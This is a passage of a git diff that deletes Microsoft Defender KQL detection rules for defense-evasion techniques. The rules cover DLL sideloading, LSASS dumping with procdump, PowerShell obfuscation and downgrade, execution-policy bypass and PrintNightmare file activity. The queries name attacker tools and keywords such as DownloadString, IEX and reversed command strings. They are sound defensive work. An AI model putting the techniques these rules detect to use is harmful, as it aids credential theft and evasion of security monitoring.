-// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql b/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql
deleted file mode 100644
index 3d46efa4..00000000
--- a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/21
-// Level: high
-// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql
deleted file mode 100644
index 2d6086da..00000000
--- a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/10/30
-// Level: high
-// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.
-This way we are also able to catch cases in which the attacker has renamed the procdump executable.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql b/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql
deleted file mode 100644
index 9b4a423d..00000000
--- a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis
-// Date: 2018/06/07
-// Level: high
-// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
-// Tags: attack.defense_evasion, attack.t1218.005
-DeviceProcessEvents
-| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql b/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql
deleted file mode 100644
index 3fce189b..00000000
--- a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql b/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql
deleted file mode 100644
index 4f76c2a3..00000000
--- a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/13
-// Level: high
-// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql b/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql
deleted file mode 100644
index 60343483..00000000
--- a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of LiveKD based on PE metadata or image name
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql b/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql
deleted file mode 100644
index 163f4b42..00000000
--- a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql b/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql
deleted file mode 100644
index b0914264..00000000
--- a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\mftrace.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql
deleted file mode 100644
index 327de0bf..00000000
--- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2022/08/02
-// Level: high
-// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql
deleted file mode 100644
index 46d0f2c6..00000000
--- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2022/08/01
-// Level: high
-// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_MsiExec_Masquerading.kql b/Defense Evasion/Potential_MsiExec_Masquerading.kql
deleted file mode 100644
index 7624082c..00000000
--- a/Defense Evasion/Potential_MsiExec_Masquerading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/11/14
-// Level: high
-// Description: Detects the execution of msiexec.exe from an uncommon directory
-// Tags: attack.defense_evasion, attack.t1036.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql b/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql
deleted file mode 100644
index 5c519edc..00000000
--- a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql b/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql
deleted file mode 100644
index 39dcb31d..00000000
--- a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock
-// Date: 2021/10/07
-// Level: high
-// Description: Detects registry keys related to NetWire RAT
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\software\\NetWire"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql b/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql
deleted file mode 100644
index 1cd01f26..00000000
--- a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/17
-// Level: medium
-// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql b/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql
deleted file mode 100644
index de4b3519..00000000
--- a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects possible password spraying attempts using Dsacls
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql b/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql
deleted file mode 100644
index 720a8993..00000000
--- a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/27
-// Level: medium
-// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryValueSet" and RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations") and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql b/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql
deleted file mode 100644
index 5e923f8b..00000000
--- a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/30
-// Level: medium
-// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData startswith "URL:" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\CLASSES") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql
deleted file mode 100644
index 617d3ee9..00000000
--- a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/17
-// Level: medium
-// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql b/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql
deleted file mode 100644
index 0af11ee9..00000000
--- a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql b/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql
deleted file mode 100644
index 901cfc87..00000000
--- a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
-// Date: 2020/10/15
-// Level: high
-// Description: Detects the PowerShell command lines with special characters
-// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql b/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql
deleted file mode 100644
index 1a70acae..00000000
--- a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harish Segar (rule)
-// Date: 2020/03/20
-// Level: medium
-// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql
deleted file mode 100644
index ef414d97..00000000
--- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/11
-// Level: medium
-// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql
deleted file mode 100644
index 6c46475e..00000000
--- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/11
-// Level: high
-// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql b/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql
deleted file mode 100644
index 9ef6f39d..00000000
--- a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018/08/25
-// Level: high
-// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
-This detection assumes that PowerShell commands are passed via the CommandLine.
-
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
deleted file mode 100644
index b0d3f76d..00000000
--- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: high
-// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
deleted file mode 100644
index 94151df4..00000000
--- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/09
-// Level: high
-// Description: Detects suspicious encoded character syntax often used for defense evasion
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql b/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql b/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql
deleted file mode 100644
index 0b840a5c..00000000
--- a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
-// Date: 2020/10/14
-// Level: medium
-// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "SyncInvoke "
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql b/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql
deleted file mode 100644
index cd1604d6..00000000
--- a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander McDonald
-// Date: 2022/06/24
-// Level: high
-// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
